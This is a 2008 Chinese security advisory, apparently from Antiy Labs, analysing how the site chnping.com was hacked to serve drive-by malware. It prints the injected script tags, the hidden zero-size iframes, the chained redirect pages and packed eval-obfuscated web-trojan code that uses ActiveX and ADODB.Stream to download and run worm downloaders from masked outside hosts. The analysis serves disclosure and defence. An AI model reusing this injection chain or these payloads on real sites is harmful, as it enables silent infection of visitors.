您的位置: 首页  >> 木马查杀 >> 阅读资讯：中国网络站队网站挂马事件

中国网络站队网站挂马事件

[ 作者：安天 | 更新日期:2008-1-3 16:44:50 | 阅读次数： ]

1月3日，安天实验室发现，中国网络站队网站(http://www.chnping.com/)
被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶
意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死
机。
　
　　该网站被插入代码：

　　

　　<script language='javascript'
　　src='http://20****.com/AD/200712/29.js'></script><iframe
　　src=http://xxx.hao****.com/xx.htm?id=017 width=0 height=0>
　　</iframe><iframe src=http://www.123dong****.cn/gg.htm 　　
　　width=20 height=0></iframe>
　　http://203****n.com/AD/200712/29.js关键代码：
　　objAD.ADIntro = "<iframe src=http://pr.74****.com/ww/new05.
　　htm?123 width=0 height=0></iframe>\n\r
　　<iframe src=http://163.jiu****.com/wz/4.htm width=20
　　height=0> </iframe>\n\r<iframe src=http://www.t****.cn
　　/top.htm width=1 height=1></iframe>";
　　
　　http://pr.74****.com/ww/new05.htm?123代码如下：

　　
　　
　　<iframe src=http://pr.74****.com/dm/dy.htm
　　width=1 height=1> </iframe>
　　<iframe src=http://pr.74****.com/dm/rl.htm
　　width=1 height=1> </iframe>
　　http://pr.74****.com/dm/dy.htm加密网马代码：
　　<SCRIPT LANGUAGE="JavaScript">
　　eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':
　　e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
　　c.toString(36))};if(!''.replace(/^/,String)){while(c--)
　　{d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];
　　e=function(){return'\\w+'};c=1};while(c--){if(k[c])
　　{p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}
　　returnp}('17("\\o\\w\\i\\3\\0\\5\\4\\i\\d\\5\\i\\5
　　\\0\\9\\c\\l\\b\\4\\3\\w\\g\\2\\i\\0\\8\\t\\1\\5\\
　　0\\2\\9\\c\\m\\t\\5\\i\\b\\4\\t\\8\\4\\i\\k\\4\\7
　　\\b\\a\\5\\i\\5\\0\\q\\5\\o\\9\\b\\4\\3\\w\\g\\2\\
　　i\\0\\8\\3\\4\\4\\11\\5\\2\\8\\5\\i\\b\\2\\G\\N\\o
　　\\9\\A\\N\\18\\A\\c\\a\\a\\R\\s\\c\\l\\0\\1\\y\\l
　　\\u\\7\\1\\d\\2\\q\\u\\7\\1\\d\\7\\b\\4\\a\\9\\b
　　\\4\\3\\w\\g\\2\\i\\0\\8\\3\\1\\2\\7\\0\\2\\x\\k
　　\\2\\g\\2\\i\\0\\9\\6\\4\\j\\p\\2\\3\\0\\6\\c\\c
　　\\q\\7\\b\\4\\8\\e\\2\\0\\C\\0\\0\\1\\5\\j\\w\\0
　　\\2\\9\\6\\3\\k\\7\\e\\e\\5\\b\\6\\T\\6\\3\\k\\e
　　\\5\\b\\O\\10\\P\\E\\M\\U\\D\\D\\M\\R\\M\\D\\C\\
　　X\\R\\s\\s\\P\\v\\R\\E\\16\\X\\C\\R\\v\\v\\U\\v\\
　　I\\1d\\U\\12\\E\\x\\X\\M\\6\\c\\q\\u\\7\\1\\d\\7
　　\\e\\a\\7\\b\\4\\8\\3\\1\\2\\7\\0\\2\\4\\j\\p\\2
　　\\3\\0\\9\\6\\C\\b\\4\\b\\j\\8\\Q\\0\\1\\2\\7\\g
　　\\6\\T\\6\\6\\c\\m\\3\\7\\0\\3\\n\\9\\2\\c\\l\\m
　　\\q\\o\\5\\i\\7\\k\\k\\y\\l\\u\\7\\1\\d\\2\\G\\f
　　\\5\\1\\2\\e\\a\\i\\2\\t\\d\\P\\7\\0\\2\\9\\c\\q
　　\\2\\G\\f\\5\\1\\2\\e\\8\\e\\2\\0\\V\\5\\g\\2\\9
　　\\2\\G\\f\\5\\1\\2\\e\\8\\K\\2\\0\\V\\5\\g\\2\\9　　
　　\\c\\14\\12\\I\\Y\\M\\v\\Y\\M\\v\\Y\\s\\v\\v\\v　　
　　\\c\\q\\b\\4\\3\\w\\g\\2\\i\\0\\8\\3\\4\\4\\11
　　\\5\\2\\a\\A\\5\\2\\f\\k\\a\\4\\1\\2\\1\\q\\f\\7
　　\\0\\n\\a\\h\\q\\2\\G\\f\\5\\1\\2\\e\\a\\A\\14\\
　　2\\G\\f\\5\\1\\2\\e\\8\\0\\4\\1b\\15\\V\\Q\\0\\1
　　\\5\\i\\K\\9\\c\\q\\5\\o\\9\\2\\W\\a\\6\\J\\4\\j
　　\\p\\2\\3\\0\\d\\x\\1\\1\\4\\1\\H\\6\\c\\l\\b\\4
　　\\3\\w\\g\\2\\i\\0\\8\\t\\1\\5\\0\\2\\9\\6\\B\\e
　　\\3\\1\\5\\f\\0\\d\\e\\1\\3\\a\\n\\0\\0\\f\\O\\r
　　\\h\\r\\h\\f\\1\\8\\z\\I\\E\\D\\z\\s\\8\\3\\4\\g
　　\\r\\h\\b\\g\\r\\h\\s\\s\\8\\p\\e\\F\\B\\r\\h\\e
　　\\3\\1\\5\\f\\0\\F\\6\\c\\m\\2\\k\\e\\2\\l\\0\\1
　　\\y\\l\\u\\7\\1\\d\\o\\q\\u\\7\\1\\d\\e\\0\\4\\1
　　\\g\\a\\i\\2\\t\\d\\C\\3\\0\\5\\u\\2\\Z\\N\\j\\p
　　\\2\\3\\0\\9\\6\\15\\L\\Q\\8\\Q\\0\\4\\1\\g\\L\\
　　k\\7\\y\\2\\1\\6\\c\\m\\3\\7\\0\\3\\n\\9\\o\\c\\
　　l\\m\\q\\o\\5\\i\\7\\k\\k\\y\\l\\5\\o\\9\\o\\W\\
　　a\\6\\J\\4\\j\\p\\2\\3\\0\\d\\x\\1\\1\\4\\1\\H\\
　　6\\c\\l\\b\\4\\3\\w\\g\\2\\i\\0\\8\\t\\1\\5\\0\\
　　2\\9\\6\\B\\e\\3\\1\\5\\f\\0\\d\\e\\1\\3\\a\\n\\
　　0\\0\\f\\O\\r\\h\\r\\h\\f\\1\\8\\z\\I\\E\\D\\z\\
　　s\\8\\3\\4\\g\\r\\h\\b\\g\\r\\h\\j\\j\\8\\p\\e\\
　　F\\B\\r\\h\\e\\3\\1\\5\\f\\0\\F\\6\\c\\m\\m\\0\\
　　1\\y\\l\\u\\7\\1\\d\\K\\q\\u\\7\\1\\d\\f\\f\\e\\
　　a\\i\\2\\t\\d\\C\\3\\0\\5\\u\\2\\Z\\N\\j\\p\\2\\
　　3\\0\\9\\6\\L\\N\\1c\\x\\13\\L\\1a\\C\\19\\x\\13
　　\\8\\L\\4\\t\\2\\1\\L\\k\\7\\y\\2\\1\\U\\0\\1\\k
　　v\\8\\s\\6\\c\\m\\3\\7\\0\\3\\n\\9\\K\\c\\l\\m\\q
　　\\o\\5\\i\\7\\k\\k\\y\\l\\5\\o\\9\\K\\W\\a\\6\\J
　　\\4\\j\\p\\2\\3\\0\\d\\x\\1\\1\\4\\1\\H\\6\\c\\l
　　\\b\\4\\3\\w\\g\\2\\i\\0\\8\\t\\1\\5\\0\\2\\9\\6
　　\\B\\e\\3\\1\\5\\f\\0\\d\\e\\1\\3\\a\\n\\0\\0\\f
　　\\O\\r\\h\\r\\h\\f\\1\\8\\z\\I\\E\\D\\z\\s\\8\\3
　　\\4\\g\\r\\h\\b\\g\\r\\h\\f\\f\\8\\p\\e\\F\\B\\r
　　\\h\\e\\3\\1\\5\\f\\0\\F\\6\\c\\m\\m\\0\\1\\y\\l
　　\\u\\7\\1\\d\\n\\q\\u\\7\\1\\d\\4\\j\\p\\a\\i\\2
　　\\t\\d\\C\\3\\0\\5\\u\\2\\Z\\N\\j\\p\\2\\3\\0\\9
　　\\6\\10\\7\\5\\b\\w\\10\\7\\1\\8\\V\\4\\4\\k\\6
　　\\c\\m\\3\\7\\0\\3\\n\\9\\n\\c\\l\\m\\q\\o\\5\\
　　i\\7\\k\\k\\y\\l\\5\\o\\9\\n\\W\\a\\6\\J\\4\\j\\
　　p\\2\\3\\0\\d\\x\\1\\1\\4\\1\\H\\6\\c\\l\\4\\j\\
　　p\\8\\P\\k\\4\\7\\b\\P\\Q\\9\\6\\n\\0\\0\\f\\O\\
　　h\\h\\b\\b\\8\\z\\I\\E\\D\\z\\s\\8\\3\\4\\g\\h\\
　　j\\j\\h\\j\\b\\8\\3\\7\\j\\6\\T\\6\\j\\b\\8\\2\\
　　G\\2\\6\\T\\v\\c\\m\\m\\5\\o\\9\\o\\a\\a\\6\\J\\
　　4\\j\\p\\2\\3\\0\\d\\x\\1\\1\\4\\1\\H\\6\\S\\S\\
　　K\\a\\a\\6\\J\\4\\j\\p\\2\\3\\0\\d\\x\\1\\1\\4\\
　　1\\H\\6\\S\\S\\n\\a\\a\\6\\J\\4\\j\\p\\2\\3\\0\\
　　d\\x\\1\\1\\4\\1\\H\\6\\c\\l\\b\\4\\3\\w\\g\\2\\
　　i\\0\\8\\t\\1\\5\\0\\2\\9\\6\\B\\5\\o\\1\\7\\g\
　　\2\\d\\t\\5\\b\\0\\n\\a\\A\\s\\v\\A\\d\\n\\2\\5
　　\\K\\n\\0\\a\\A\\s\\v\\A\\d\\e\\1\\3\\a\\A\\n\\
　　0\\0\\f\\O\\h\\h\\f\\1\\8\\z\\I\\E\\D\\z\\s\\8
　　\\3\\4\\g\\h\\b\\g\\h\\k\\k\\8\\n\\0\\g\\A\\F\
　　\B\\h\\5\\o\\1\\7\\g\\2\\F\\6\\c\\m\\m\\m\\m")',
　　62,76,'164|162|145|143|157|151|42|141|56|50|75|
　　144|51|40|163|160|155|57|156|142|154|173|175|
　　150|146|152|73|134|61|167|166|60|165|105|171|
　　67|47|74|101|65|71|76|170|135|64|133|147|120|
　　66|117|72|104|123|55|46|54|103|124|41|63|52|
　　130|102|153|62|122|53|115|70|eval|113|131|114|
　　107|127|106'.split('|'),0,{}))
　　</SCRIPT>
　　其目的是连接地址：http://dd.74****.com/bb/014.exe
　　下载文件：014.exe
　　http://pr.74****.com/dm/rl.htm加密代码：

　　

　　http://163.jiu****.com/wz/4.htm代码如下：

　　

　　<iframe src=http://w.7***.com/s4.htm
　　 width=100 height=0></iframe>

　　<iframe src=http://yun.yu****.com/web/6677640.htm
　　width=100 height=0></iframe>

　　<iframe src=http:/www.zj***.com.cn/top.htm
　　width=0 height=0></iframe>

　　http://w.7***.com/s4.htm代码如下：

　　

　　<iframe src=http://w.7***.com/ps/nb.htm
　　width=100 height=0></iframe>
　　<script language="javascript"
　　src="http://count4.5****.com/click.aspx?
　　id=47742833&logo=12"></script>
　　<script src='http://s101.c***.com/stat.php?
　　id=665092&web_id=665092' language='JavaScript'
　　charset='gb2312'></script>
　　http://w.7***.com/ps/nb.htm
　　http://count4.5****.com/click.aspx?id=47742833&logo=12
　　http://s101.c***.com/stat.php?id=665092&web_id=665092

　　以上三个连接地址代码均为加密代码其目的是连接：
　　http://e.6***.com/ps/014.exe

　　http://yun.yu****.com/web/6677640.htm代码如下：

　　

　　htm.html加密代码：
　　<SCRIPT LANGUAGE='JavaScript'>
　　function ResumeError()
　　{
　　return true;
　　}
　　window.onerror = ResumeError;
　　</SCRIPT>
　　<SCRIPT LANGUAGE="JavaScript">
　　eval(function(p,a,c,k,e,d){e=function(c)
　　{return(c<a?'':e(parseInt(c/a)))+((c=c%a)
　　>35?String.fromCharCode(c+29):c.toString
　　(36))};if(!''.replace(/^/,String)){while
　　(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
　　{return d[e]}];e=function(){return'\\w+'}
　　;c=1};while(c--){if(k[c]){p=p.replace
　　(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}
　　return p}('1d(1e("/*1f*/%C%1c%1b%6%2%f.
　　d%6%2%18.19%1a%L%G.I.1g%6%1h%A%2%5%5-1%
　　2%D%i%1n%c%1o%5%G.1l%6%1i%0%2%2%1j.17%
　　6%1p%0%t%16%S-T-U-V-R%0%2%c%O%Q.P%6%W.
　　X%0%t%0%0%2%o%F%2%l%7%n%i%13%p%14%6%2%J.
　　15%12.11%6%2+Y*H*H*10%2%1k.I%5%1q%20%
　　1P%5/%J%5%A+1O.1N%6%2%L%F%k%5%0%a%9%
　　b%0%2%f.d%6%0%u%v%z%g%4/%4/e.h.j%4/
　　q%4/1.w%8%m%4/y%8%0%2%1M%D%i%1Y%c%
　　1Z%p%x%6%1X.1W%0%2%o%s%2%l%7%n%r%s
　　%k%5%0%a%9%b%0%2%f.d%6%0%u%v%z%g%
　　4/%4/e.h.j%4/q%4/1T.w%8%m%4/y%8%0
　　%2%7%E%i%1U%c%1R%p%x%6%1J.1w.1%0
　　%2%o%B%2%l%7%n%r%B%k%5%0%a%9%b%0
　　%2%f.d%6%0%u%v%z%g%4/%4/e.h.j%4
　　/q%4/1r.w%8%m%4/y%8%0%2%7%E%i%1
　　z%c%1G%p%x%6%1F.1E%0%2%o%M%2%l%
　　7%n%r%M%k%5%0%a%9%b%0%2%1s.1y%6
　　%1x%g//e.h.j/1S.1L%0%t%1I.Z%0%
　　1m%2%7%1K%s%5%5%0%a%9%b%0%N%1Q%5%5
　　%0%a%9%b%0%N%1V%5%5%0%a%9%b%0%2%f.
　　d%6%0%1D%1C%5%K%1B%5%K%1H%5%1A%g%4/
　　%4/e.h.j%4/q%4/3.1t%A%8%m/1v%8%0%2%
　　7%7%7%7%C%1u"))',62,125,'22||29|
　　|5C|3D|28|7D|3E|20Error|5Bobject
　　|5D|3Bvar|write|yun|7Bdocument|3A|
　　yun878|7Bvar|com|21|7B|3C|3Bfinally
　　|7Dcatch|3Dnew|web|7Bif|28f|2C
　　|3Cscript|20src|js|20ActiveXObject
　　|script|3Dhttp|27|28g|0D|7Btry|7Dtry
　　|28e|28document|60|cookie|3Bexpires
　　|2710|3Bif|28h|26|20as|createobject
　　|3Dado|00C04FC29E36|3ABD96C556|65A3
　　|11D0|983A|22Adodb|Stream|24|exe|1000
　　|getTime|28expires|20expires|20Date
　　|setTime|22clsid|setAttribute|7Dwindow
　　|onload|3Dinit|20init|0Afunction|eval
　　|unescape|YVdZZ0tHaGxlREV1WTJobFkydGxaQ
　　2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNB
　　Z0lDQWdJRzF2Ym5sbGNpQXJQU0FpWEZ4MUlpQXJ
　　JRzVsZHlCQmNuSmhlU2cxSUMwZ1UzUnlhVzVuS0
　　hNcExteGxibWQwYUNrdWFtOXBiaWdpTUNJcElDc
　　2djenNO|indexOf|27OK|22object|3Bado|3Bd
　　ocument|createElement|2C0|20e|20ado|22c
　　lassid|27ckoo|pps|7Bobj|htm|0A|iframe
　　|PowerPlayerCtrl|22http|DloadDS|20h
　　|27http|27height|20width|3Ciframe|
　　Tool|22BaiduBar|20obj|27src|22bd|22POWERP
　　LAYER|7Dif|cab|7Delse|toGMTString|expires
　　|3Bpath|26g|20pps|ad|bf|20g|26h|StormPlayer
　　|22MPS|20f|20storm|3Dieorer'.split('|'),0,{}))

　　window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
　　["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72
　　\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27
　　\x31\x30\x30\x27\x68\x65\x69\x67\x68\x74
　　\x3d\x27\x30\x27\x73\x72\x63\x3d\x27\x68
　　\x74\x74\x70\x3a\x2f\x2f\x79\x75\x6e\x2e\
　　x79\x75\x6e\x38\x37\x38\x2e\x63\x6f\x6d\
　　x2f\x77\x65\x62\x2f\x32\x2e\x68\x74\x6d\
　　x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
　　/*web*/
　　</SCRIPT>

　　其目的是连接下载地址：
　　http://yun.yu****.com/14.exe

　　http://www.123dong****.cn/gg.htm其目的连接下载地址：
　　http://yun.yu****.com/14.exe下载大量的恶意程序。

　　当用户访问http://www.chn****.com时，
　　系统会自动下载以下病毒文件：

　　http://yun.yu****.com/14.exe
　　病毒名：(Worm.Win32.Downloader.bd) 蠕虫下载者

　　http://e.6***.com/ps/014.exe
　　病毒名：(Worm.Win32.Downloader.dq) 蠕虫下载者

　　http://dd.74****.com/bb/014.exe
　　病毒名：(Worm.Win32.Downloader.cx) 蠕虫下载者

　　以上病毒文件为蠕虫下载者，自动运行后将会下载大量的恶意文件！
　　由于下载数量太多，这里不一一分析。